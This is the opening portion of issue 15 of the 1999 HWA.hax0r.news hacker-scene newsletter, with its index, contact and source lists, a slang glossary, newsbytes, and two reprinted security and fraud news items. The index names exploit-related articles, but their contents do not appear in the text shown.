💾 Archived View for clemat.is › saccophore › library › ezines › textfiles › ezines › HWA › hwa-hn15.… captured on 2022-01-08 at 15:59:14.
⬅️ Previous capture (2021-12-03)
-=-=-=-=-=-=-
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
= <=-[ HWA.hax0r.news ]-=> =
==========================================================================
[=HWA'99=] Number 15 Volume 1 1999 April 25 99
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================
"Silly hacker, root is for administrators"
- Project Gamma
Synopsis
---------
The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news
and anything else I think is worthy of a look see. (remember i'm doing
this for me, not you, the fact some people happen to get a kick/use
out of it is of secondary importance).
This list is NOT meant as a replacement for, nor to compete with, the
likes of publications such as CuD or PHRACK or with news sites such as
AntiOnline, the Hacker News Network (HNN) or mailing lists such as
BUGTRAQ or ISN nor could any other 'digest' of this type do so.
It *is* intended however, to compliment such material and provide a
reference to those who follow the culture by keeping tabs on as many
sources as possible and providing links to further info, its a labour
of love and will be continued for as long as I feel like it, i'm not
motivated by dollars or the illusion of fame, did you ever notice how
the most famous/infamous hackers are the ones that get caught? there's
a lot to be said for remaining just outside the circle... <g>
@HWA
=-----------------------------------------------------------------------=
Welcome to HWA.hax0r.news ... #15
=-----------------------------------------------------------------------=
*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*** ***
*** please join to discuss or impart news on techno/phac scene ***
*** stuff or just to hang out ... someone is usually around 24/7***
*** ***
*** Note that the channel isn't there to entertain you its for ***
*** you to talk to us and impart news, if you're looking for fun***
*** then do NOT join our channel try #weirdwigs or something... ***
*** we're not #chatzone or #hack ***
*** ***
*******************************************************************
=-------------------------------------------------------------------------=
Issue #15
=--------------------------------------------------------------------------=
[ INDEX ]
=--------------------------------------------------------------------------=
Key Content
=--------------------------------------------------------------------------=
00.0 .. COPYRIGHTS ......................................................
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
00.2 .. SOURCES .........................................................
00.3 .. THIS IS WHO WE ARE ..............................................
00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
00.5 .. THE HWA_FAQ V1.0 ................................................
01.0 .. GREETS ..........................................................
01.1 .. Last minute stuff, rumours, newsbytes ...........................
01.2 .. Mailbag .........................................................
02.0 .. From the Editor..................................................
03.0 .. Walls and security decoys........................................
04.0 .. Securities fraud man released on $50,000 bond....................
05.0 .. Another privacy hole in MSIE 5.0 ................................
06.0 .. High tech on the battlefield.....................................
07.0 .. Hotmail has similar vulnerabilty to last weeks rocketmail advisory
08.0 .. Vulnerability in MacPerl CGI ....................................
09.0 .. The Adobe Acrobat NetBus scare thread;...........................
10.0 .. Crackpipe.c bypasses any firewalls via tunneling (linux).........
11.0 .. Unix rshd and rsh/rpc vulnerabilties in WindowsNT................
12.0 .. Are your IT professionals on Drugs?..............................
13.0 .. Rand corporation releases a paper on Cyber Terrorism.............
14.0 .. FAA to implement CAPS............................................
15.0 .. The Ebayla Hack..................................................
16.0 .. Cool security in Dutch PTT site allows users to send anonymous spam
17.0 .. Cold Fusion vulnerability, thousands of sites exposed to danger.
18.0 .. Privacy at risk in e-commerce rush ..............................
18.1 .. CC numbers left vulnerable by many shopping cart programs........
18.2 .. E-tailers scramble to fix security holes.........................
19.0 .. Got lots of time and computing power on your hands?..............
20.0 .. EU and US disagree on privacy laws...............................
21.0 .. Compuserve in court over slander charges.........................
22.0 .. Cyberwar and Netwar..............................................
23.0 .. IT Managers push for better online security......................
24.0 .. Popular Mechanics article "Hackers:America's real threat".....FUD
25.0 .. URL bug in AIM creates a DoS ....................................
26.0 .. Shutting up Cell Phones..........................................
27.0 .. Interview with Aleph1............................................
28.0 .. World Wide Wangle cmp net techweb article (FUD)..................
29.0 .. Microsoft DHTML patch advisory...................................
30.0 .. Microsoft MSIE4 and 5 vulnerabilities patch advisory.............
31.0 .. [ISN] DoD considers disconnecting from the net because of attacks.
32.0 .. [ISN] Digital Dicks...............................................
33.0 .. [ISN] Spooktech99.................................................
34.0 .. [ISN] review:"Ethical and Social Issues in the Information Age",..
35.0 .. [ISN] Update your AV software!, CIH virus to hit April 26th......
36.0 .. [ISN] More online store problems.................................
37.0 .. Mitnick Documents exposed........................................
38.0 .. New LPR package (linux)..........................................
39.0 .. New PROCMAIL package (linux) ....................................
40.0 .. Final call for papers for CQRE (Secure)..........................
41.0 .. Anyboard WWW vulnerability.......................................
42.0 .. Egroups bug......................................................
43.0 .. [ISN] Ok lets see some I.D (Biometrics)..........................
44.0 .. Javascript hotmail password trap ................................
45.0 .. Discus web based discussion software advisory....................
=--------------------------------------------------------------------------=
AD.S .. Post your site ads or etc here, if you can offer something in return
thats tres cool, if not we'll consider ur ad anyways so send it in.
ads for other zines are ok too btw just mention us in yours, please
remember to include links and an email contact. Corporate ads will
be considered also and if your company wishes to donate to or
participate in the upcoming Canc0n99 event send in your suggestions
and ads now...n.b date and time may be pushed back join mailing list
for up to date information.......................................
Current dates: Aug19th-22nd Niagara Falls... .................
HA.HA .. Humour and puzzles ............................................
Hey You!........................................................
=------=........................................................
Send in humour for this section! I need a laugh and its hard to
find good stuff... ;)...........................................
HOW.TO .. "How to hack" by our illustrious editor.........................
SITE.1 .. Featured site, .................................................
H.W .. Hacked Websites ...............................................
A.0 .. APPENDICES......................................................
A.1 .. PHACVW linx and references......................................
=--------------------------------------------------------------------------=
@HWA'99
00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE
OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO
WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT
(LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST
READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).
Important semi-legalese and license to redistribute:
YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF
AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE
ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED
IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE
APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK
ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL
ME PRIVATELY current email cruciphux@dok.org
THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL
WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL
THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:
I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE
AND REDISTRIBUTE/MIRROR. - EoD
Although this file and all future issues are now copyright, some of
the content holds its own copyright and these are printed and
respected. News is news so i'll print any and all news but will quote
sources when the source is known, if its good enough for CNN its good
enough for me. And i'm doing it for free on my own time so pfffft. :)
No monies are made or sought through the distribution of this material.
If you have a problem or concern email me and we'll discuss it.
cruciphux@dok.org
Cruciphux [C*:.]
00.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
Canada / North America (hell even if you are inside ..) and wish to
send printed matter like newspaper clippings a subscription to your
cool foreign hacking zine or photos, small non-explosive packages
or sensitive information etc etc well, now you can. (w00t) please
no more inflatable sheep or plastic dog droppings, or fake vomit
thanks.
Send all goodies to:
HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5
WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
~~~~~~~ reading this from some interesting places, make my day and get a
mention in the zine, send in a postcard, I realize that some places
it is cost prohibitive but if you have the time and money be a cool
dude / gal and send a poor guy a postcard preferably one that has some
scenery from your place of residence for my collection, I collect stamps
too so you kill two birds with one stone by being cool and mailing in a
postcard, return address not necessary, just a "hey guys being cool in
Bahrain, take it easy" will do ... ;-) thanx.
Ideas for interesting 'stuff' to send in apart from news:
- Photo copies of old system manual front pages (optionally signed by you) ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON
compromising position plz I don't want pr0n. <g>
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
tapes with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone
fun or social engineering examples or transcripts thereof.
If you still can't think of anything you're probably not that interesting
a person after all so don't worry about it <BeG>
Our current email:
Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas72@usa.net
@HWA
00.2 Sources ***
~~~~~~~~~~~
Sources can be some, all, or none of the following (by no means complete
nor listed in any degree of importance) Unless otherwise noted, like msgs
from lists or news from other sites, articles and information is compiled
and or sourced by Cruciphux no copyright claimed.
HiR:Hackers Information Report... <a href="http://axon.jccc.net/hir/">http://axon.jccc.net/hir/</a>
News & I/O zine ................. <a href="http://www.antionline.com/">http://www.antionline.com/</a>
Back Orifice/cDc..................<a href="http://www.cultdeadcow.com/">http://www.cultdeadcow.com/</a>
News site (HNN) .....,............<a href="http://www.hackernews.com/">http://www.hackernews.com/</a>
Help Net Security.................<a href="http://net-security.org/">http://net-security.org/</a>
News,Advisories,++ ...............<a href="http://www.l0pht.com/">http://www.l0pht.com/</a>
NewsTrolls (HNN)..................<a href="http://www.newstrolls.com/">http://www.newstrolls.com/</a>
News + Exploit archive ...........<a href="http://www.rootshell.com/beta/news.html">http://www.rootshell.com/beta/news.html</a>
CuD ..............................<a href="http://www.soci.niu.edu/~cudigest">http://www.soci.niu.edu/~cudigest</a>
News site+........................<a href="http://www.zdnet.com/">http://www.zdnet.com/</a>
News site+........................<a href="http://www.gammaforce.org/">http://www.gammaforce.org/</a>
News site+........................<a href="http://www.projectgamma.com/">http://www.projectgamma.com/</a>
News site+........................<a href="http://securityhole.8m.com/">http://securityhole.8m.com/</a>
+Various mailing lists and some newsgroups, such as ...
+other sites available on the HNN affiliates page, please see
http://www.hackernews.com/affiliates.html as they seem to be popping up
rather frequently ...
http://www.the-project.org/ .. IRC list/admin archives
http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk
alt.hackers.malicious
alt.hackers
alt.2600
BUGTRAQ
ISN security mailing list
ntbugtraq
<+others>
NEWS Agencies, News search engines etc:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.cnn.com/SEARCH/
<a href="http://www.cnn.com/SEARCH/">Link</a>
http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
<a href="http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0">Link</a>
http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
<a href="http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack">Link</a>
http://www.ottawacitizen.com/business/
<a href="http://www.ottawacitizen.com/business/">Link</a>
http://search.yahoo.com.sg/search/news_sg?p=hack
<a href="http://search.yahoo.com.sg/search/news_sg?p=hack">Link</a>
http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
<a href="http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack">Link</a>
http://www.zdnet.com/zdtv/cybercrime/
<a href="http://www.zdnet.com/zdtv/cybercrime/">Link</a>
http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)
<a href="http://www.zdnet.com/zdtv/cybercrime/chaostheory/">Link</a>
NOTE: See appendices for details on other links.
http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
<a href="http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm">Link</a>
http://freespeech.org/eua/ Electronic Underground Affiliation
<a href="http://freespeech.org/eua/">Link</a>
http://ech0.cjb.net ech0 Security
<a href="http://ech0.cjb.net ech0 Security">Link</a>
http://net-security.org Net Security
<a href="http://net-security.org">Link</a>
...
Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~
All submissions that are `published' are printed with the credits
you provide, if no response is received by a week or two it is assumed
that you don't care wether the article/email is to be used in an issue
or not and may be used at my discretion.
Looking for:
Good news sites that are not already listed here OR on the HNN affiliates
page at http://www.hackernews.com/affiliates.html
Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse hole or cool thingy. ;-) cut em out and send it
to the drop box.
- Ed
Mailing List Subscription Info (Far from complete) Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~
ISS Security mailing list faq : http://www.iss.net/iss/maillist.html
THE MOST READ:
BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~
What is Bugtraq?
Bugtraq is a full-disclosure UNIX security mailing list, (see the info
file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to
bugtraq, send mail to listserv@netspace.org containing the message body
subscribe bugtraq. I've been archiving this list on the web since late
1993. It is searchable with glimpse and archived on-the-fly with hypermail.
Searchable Hypermail Index;
http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html
<a href="http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html">Link</a>
About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The following comes from Bugtraq's info file:
This list is for *detailed* discussion of UNIX security holes: what they are,
how to exploit, and what to do to fix them.
This list is not intended to be about cracking systems or exploiting their
vulnerabilities. It is about defining, recognizing, and preventing use of
security holes and risks.
Please refrain from posting one-line messages or messages that do not contain
any substance that can relate to this list`s charter.
I will allow certain informational posts regarding updates to security tools,
documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
on this list.
Please follow the below guidelines on what kind of information should be posted
to the Bugtraq list:
+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security organizations
+ Incident advisories or informational reporting
Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq
reflector address if the response does not meet the above criteria.
Remember: YOYOW.
You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of
those words without your permission in any medium outside the distribution of this list may be challenged by you, the author.
For questions or comments, please mail me:
chasin@crimelab.com (Scott Chasin)
Crypto-Gram
~~~~~~~~~~~
CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.
To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com.� To unsubscribe,
visit http://www.counterpane.com/unsubform.html.� Back issues are available
on http://www.counterpane.com.
CRYPTO-GRAM is written by Bruce Schneier.� Schneier is president of
Counterpane Systems, the author of "Applied Cryptography," and an inventor
of the Blowfish, Twofish, and Yarrow algorithms.� He served on the board of
the International Association for Cryptologic Research, EPIC, and VTW.� He
is a frequent writer and lecturer on cryptography.
CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This info directly from their latest ish:
Computer underground Digest��� Sun� 14 Feb, 1999�� Volume 11 : Issue 09
�����
��������������������� ISSN� 1004-042X
������ Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
������ News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
������ Archivist: Brendan Kehoe
������ Poof Reader:�� Etaion Shrdlu, Jr.
������ Shadow-Archivists: Dan Carosone / Paul Southworth
������������������������� Ralph Sims / Jyrki Kuoppala
������������������������� Ian Dickinson
������ Cu Digest Homepage: http://www.soci.niu.edu/~cudigest
[ISN] Security list
~~~~~~~~~~~~~~~~~~~
This is a low volume list with lots of informative articles, if I had my
way i'd reproduce them ALL here, well almost all .... ;-) - Ed
Subscribe: mail majordomo@repsec.com with "subscribe isn".
@HWA
00.3 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~
Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/IRC+ man in black
sas72@usa.net ............. currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black
Foreign Correspondants/affiliate members
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ATTENTION: All foreign correspondants please check in or be removed by next
issue I need your current emails since contact info was recently lost in a
HD mishap and i'm not carrying any deadweight. Plus we need more people sending
in info, my apologies for not getting back to you if you sent in January I lost
it, please resend.
N0Portz ..........................: Australia
Qubik ............................: United Kingdom
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck ........................: Netherlands/Holland
And unofficially yet contributing too much to ignore ;)
Spikeman .........................: World media
Please send in your sites for inclusion here if you haven't already
also if you want your emails listed send me a note ... - Ed
http://www.genocide2600.com/~spikeman/ .. Spikeman's DoS and protection site
http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)
*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*******************************************************************
:-p
1. We do NOT work for the government in any shape or form.Unless you count paying
taxes ... in which case we work for the gov't in a BIG WAY. :-/
2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news
events its a good idea to check out issue #1 at least and possibly also the
Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...
@HWA
00.4 Whats in a name? why HWA.hax0r.news??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Well what does HWA stand for? never mind if you ever find out I may
have to get those hax0rs from 'Hackers' or the Pretorians after you.
In case you couldn't figure it out hax0r is "new skewl" and although
it is laughed at, shunned, or even pidgeon holed with those 'dumb
leet (l33t?) dewds' <see article in issue #4> this is the state
of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you
up and comers, i'd highly recommend you get that book. Its almost
like buying a clue. Anyway..on with the show .. - Editorial staff
@HWA
00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Also released in issue #3. (revised) check that issue for the faq
it won't be reprinted unless changed in a big way with the exception
of the following excerpt from the FAQ, included to assist first time
readers:
Some of the stuff related to personal useage and use in this zine are
listed below: Some are very useful, others attempt to deny the any possible
attempts at eschewing obfuscation by obsucuring their actual definitions.
@HWA - see EoA ;-)
!= - Mathematical notation "is not equal to" or "does not equal"
ASC(247) "wavey equals" sign means "almost equal" to. If written
an =/= (equals sign with a slash thru it) also means !=, =< is Equal
to or less than and => is equal to or greater than (etc, this aint
fucking grade school, cripes, don't believe I just typed all that..)
AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)
AOL - A great deal of people that got ripped off for net access by a huge
clueless isp with sekurity that you can drive buses through, we're
not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
least they could try leasing one??
*CC - 1 - Credit Card (as in phraud)
2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's
CCC - Chaos Computer Club (Germany)
*CON - Conference, a place hackers crackers and hax0rs among others go to swap
ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
watch videos and seminars, get drunk, listen to speakers, and last but
not least, get drunk.
*CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
speak he's the guy that breaks into systems and is often (but by no
means always) a "script kiddie" see pheer
2 . An edible biscuit usually crappy tasting without a nice dip, I like
jalapeno pepper dip or chives sour cream and onion, yum - Ed
Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger
Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
ebonics, speaking in a dark tongue ... being ereet, see pheer
EoC - End of Commentary
EoA - End of Article or more commonly @HWA
EoF - End of file
EoD - End of diatribe (AOL'ers: look it up)
FUD - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt",
usually in general media articles not high brow articles such as ours or other
HNN affiliates ;)
du0d - a small furry animal that scurries over keyboards causing people to type
weird crap on irc, hence when someone says something stupid or off topic
'du0d wtf are you talkin about' may be used.
*HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R
*HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
define, I think it is best defined as pop culture's view on The Hacker ala
movies such as well erhm "Hackers" and The Net etc... usually used by "real"
hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
some coffee?' or can you hax0r some bread on the way to the table please?'
2 - A tool for cutting sheet metal.
HHN - Maybe a bit confusing with HNN but we did spring to life around the same
time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
noun means the hackernews site proper. k? k. ;&
HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html
J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d
MFI/MOI- Missing on/from IRC
NFC - Depends on context: No Further Comment or No Fucking Comment
NFR - Network Flight Recorder (Do a websearch) see 0wn3d
NFW - No fuckin'way
*0WN3D - You are cracked and owned by an elite entity see pheer
*OFCS - Oh for christ's sakes
PHACV - And variations of same <coff>
Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare
Alternates: H - hacking, hacktivist
C - Cracking <software>
C - Cracking <systems hacking>
V - Virus
W - Warfare <cyberwarfare usually as in Jihad>
A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
P - Phreaking, "telephone hacking" PHone fREAKs ...
CT - Cyber Terrorism
*PHEER - This is what you do when an ereet or elite person is in your presence
see 0wn3d
*RTFM - Read the fucking manual - not always applicable since some manuals are
pure shit but if the answer you seek is indeed in the manual then you
should have RTFM you dumb ass.
TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0
TBA - To Be Arranged/To Be Announced also 2ba
TFS - Tough fucking shit.
*w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions
from the underground masses. also "w00ten" <sic>
2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)
*wtf - what the fuck
*ZEN - The state you reach when you *think* you know everything (but really don't)
usually shortly after reaching the ZEN like state something will break that
you just 'fixed' or tweaked.
@HWA
-=- :. .: -=-
01.0 Greets!?!?! yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Thanks to all in the community for their support and interest but i'd
like to see more reader input, help me out here, whats good, what sucks
etc, not that I guarantee i'll take any notice mind you, but send in
your thoughts anyway.
* all the people who sent in cool emails and support
FProphet Pyra TwstdPair _NeM_
D----Y Kevin Mitnick (watch yer back) Dicentra
vexxation sAs72 Spikeman
and the #innerpulse, #hns crew and some inhabitants of #leetchans ....
although I use the term 'leet loosely these days, <k0ff><snicker> ;)
kewl sites:
+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.genocide2600.com/
+ http://www.genocide2600.com/~spikeman/
+ http://www.genocide2600.com/~tattooman/
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
@HWA
01.1 Last minute stuff, rumours and newsbytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"What is popular isn't always right, and what is right isn't
always popular..."
- FProphet '99
+++ When was the last time you backed up your important data?
++ April 24th today many websites including the net-security, 403-security and other
sites redirected traffic to a strike site protesting HiNet's monopoly and high pricing
for internet access in Croatia (.hr) so if you couldn't access a specific croatian
site on the 24th this internet protest was likely your reason...for more info try
accessing http://www.cwl.voyager.hr/dosta/eng/index.html the main strike info site.
"Who are we? We live in Croatia. We live on the Internet. We earn our living
at the Internet. We work on the Internet. We are the internet.
We pay for the privilege of our participation on the Internet, dearly, to the Croatian ISPs,
every month, without exception. We are being taken for granted. We are being exploited,
because we have no choice, because we need the Internet and we can�t manage without it.
We've had ENOUGH!"
++ www.innerpulse.com was not hacked according to Project Gamma who talked to Siko
and was told it was hosting problems (as we encountered on our mirror site at
cubesoft), anyway the site can be accessed via this ip/url: http://209.54.234.96/
(ed's note: our site came back online but we could still not access our account
as of this writing - Ed)
++ Excellent paper on Simulating Cyberwar and Defences
http://all.net/journal/ntb/simulate/simulate.html
++ From www.net-security.org
WINDOWS 2000 BETA 3
by deepcase, Tuesday 20th Apr 1999 on 12:01 pm CET
As Microsoft promised on CeBit 99 the Beta 3 of Windows 2000 is now available for
the public. The Beta 3 with Professional and Server version can be orderd for about
50$. This package called "Corporate Preview" includes a 3 month support. Microsoft
said that Beta 3 will be out due next week ...
++ From www.net-security.org
VIRGIN NET SUES CUSTOMER
by BHZ, Wednesday 21st Apr 1999 on 11:48 am CET
After having its e-mail briefly boycotted by a spam-defense network, British Internet
service provider Virgin Net is suing a former subscriber for sending spam from its
network. The spammer's activity resulted in the company being put briefly on the
Realtime Blackhole List (RBL), an Internet e-mail boycotting tool. The damage to
Virgin's reputation prompted the company to sue the alleged spammer for breach of
the terms and conditions of the Virgin Net customer contract. . Read whole story on
Wired. http://www.wired.com/news/news/technology/story/19224.html
Mucho thanks to Spikeman for directing his efforts to our cause of bringing
you the news we want to read about in a timely manner ... - Ed
@HWA
01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
No emails fit for inclusion in the newsletter this week!
================================================================
@HWA
02.0 From the editor.
~~~~~~~~~~~~~~~~
#include <stdio.h>
#include <thoughts.h>
#include <backup.h>
main()
{
printf ("Read commented source!\n\n");
/*
*Well this is issue #15, I didn't have time to html'ize the whole ish and am considering
*goin back to a text-only mode since it takes a lot of time to edit in the links for the
*html version, anyway here it is, have at it....
*
*
* - Ed
*
*
*/
printf ("EoF.\n");
}
Congrats, thanks, articles, news submissions and kudos to us at the
main address: hwa@press.usmc.net complaints and all nastygrams and
mailbombs can go to /dev/nul nukes, synfloods and papasmurfs to
127.0.0.1, private mail to cruciphux@dok.org
danke.
C*:.
@HWA
03.0 Walls and security decoys
~~~~~~~~~~~~~~~~~~~~~~~~~~
from CMP techweb http://www.techweb.com/wire/story/TWB19990416S0024
Technology News
Walls And Decoys Safeguard Servers
(04/16/99, 5:35 p.m. ET)
By Rutrell Yasin , InternetWeek
Two network security vendors are taking different approaches to help IT
managersprotect corporate servers from network-based attacks.
One approach builds a wall around Windows NT servers, safeguarding critical
applications and data; the other lures potential snoopers to a decoy server,
catching them in the act.
Network-1 Security Solutions Inc. recently unveiled CyberWallPlus-SV,
server-based software that protects Windows NT servers from internal and
external attacks.
Meanwhile, Network Associates Inc. unveiled CyberCop Sting, a decoy server
that traces and tracks hackers who attempt to break into computer systems.
CyberWallPlus-SV adds security functions not found in Windows NT such as
stateful packet inspection, protocol and address filtering as well as network
intrusion detection and audit logging, said Al McGuire, an information security
consultant at Network-1.
Mark Edwards, an analyst at the NTShop consultancy who tested CyberWallPlus-SV,
said the software is in a position to intercept traffic before NT has a chance to
see it because it works in the kernel of the operating system.
The server software also provides a level of intrusion detection not found in
firewalls. For example, firewalls prevent ping-of-death or denial-of-service attacks
by blocking the ping from coming through the firewall.However, IT departments may
have a need to let some pings through, Edwards said.
CyberWallPlus-SV examines the ping for attack signatures and either blocks it or
shuts down the originating IP address until an administrator can determine whether
to let the ping through, he said.
The software is available now. Pricing starts at $1,995.
While CyberWallPlus-SV keeps the bad guys out of the server, Network Associates'
CyberCop Sting works to trap them. The decoy server operates by placing fictitious
data on a server that has low security protection but sophisticated monitoring
technology.
Chris Ward, a security manager at Pagemart, a provider of wireless messaging services
and user of NAI tools, said a decoy server is an interesting concept. The trick is to
deploy it so only a few people in the company know it's there. A skilled employee
could avoid such a system, he said.
Last week, we walked a systems administrator out the door because he hacked into other
systems. CyberCop would be fascinating to play with, but I don't know how useful it will
be, Ward said.
@HWA
04.0 Securities fraud man released on $50,000 bail
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
SECURITY FRAUD
by BHZ, Saturday 17th Apr 1999 on 3:59 pm CET
An employee of California-based PairGain Technology Inc. was arrested today in
North Carolina on federal charges of fabricating a Bloomberg news service report and
posting it on the Internet, driving up the company's stock. The FBI arrested Gary Dale
Hoke, 25, at his Raleigh, N.C., home on charges of securities fraud for allegedly
disseminating false information about the company, whose stock is publicly traded,
the U.S. attorney's office in Los Angeles said. Hoke was arraigned in North Carolina,
ordered to report to California at an unspecified date and released on $50,000 bond,
said Assistant U.S. Attorney Christopher Painter.
@HWA
